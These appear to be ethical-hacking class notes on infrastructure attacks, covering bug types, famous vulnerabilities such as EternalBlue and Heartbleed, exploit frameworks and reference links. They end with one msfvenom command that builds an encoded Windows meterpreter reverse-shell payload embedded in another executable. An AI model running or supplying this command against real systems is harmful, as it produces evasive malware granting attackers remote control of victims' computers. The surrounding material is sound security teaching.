Class 6: Infrastructure Attacks

Vulnerability vs Exploit vs Payload

• https://www.infosecmatter.com/exploits-vulnerabilities-and-payloads-practical-introduction/

Searchsploit

• https://www.exploit-db.com/searchsploit

SMB-Login Hack

• https://www.hackingarticles.in/smb-penetration-testing-port-445/

Software Bugs:

• Buffer overflow
• Race condition
• Access violation
• Infinite loop
• Division by zero
• Off-by-one error
• Null pointer de-reference
• Input validation error
• Resource leak

vulnerabilities:

BlueKeep

BlueKeep (CVE-2019-0708) is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol (RDP) implementation, which allows for the possibility of remote code execution.

Shellshock

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access[3] to many Internet-facing services, such as web servers, that use Bash to process requests.

Dirty COW

Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affected all Linux-based operating systems, including Android devices, that used older versions of the Linux kernel created before 2018. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. Computers and devices that still use the older kernels remain vulnerable.

Heartbleed

Heartbleed was a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed could be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It resulted from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension.Thus, the bug's name derived from heartbeat. The vulnerability was classified as a buffer over-read, a situation where more data can be read than should be allowed.

EternalBlue

EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. This vulnerability is denoted by entry CVE-2017-0144 in the Common Vulnerabilities and Exposures (CVE) catalog. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to remotely execute code on the target computer

Exploit Frameworks

• Cobalt Strike (https://www.cobaltstrike.com/)
• Metasploit Framework (https://www.metasploit.com/)
• Metasploit Pro (https://www.rapid7.com/products/metasploit/)
• CORE IMPACT (https://www.coresecurity.com/core-impact)
• Immunity CANVAS (https://www.immunityinc.com/products/canvas/)
• D2 Elliot Web Exploitation Framework (https://www.d2sec.com/elliot.html)
• BeEF Browser Exploitation Framework (https://beefproject.com/)

Metasploits

• https://github.com/cloudsecuritylabs/ethicalhackingclass/wiki/Metaspoit

Command

msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe -o GoodMalware.exe -e x86/shikata_ga_nai -i 15 --platform windows lhost=eth0 lport=4949 -x Bsadware.exe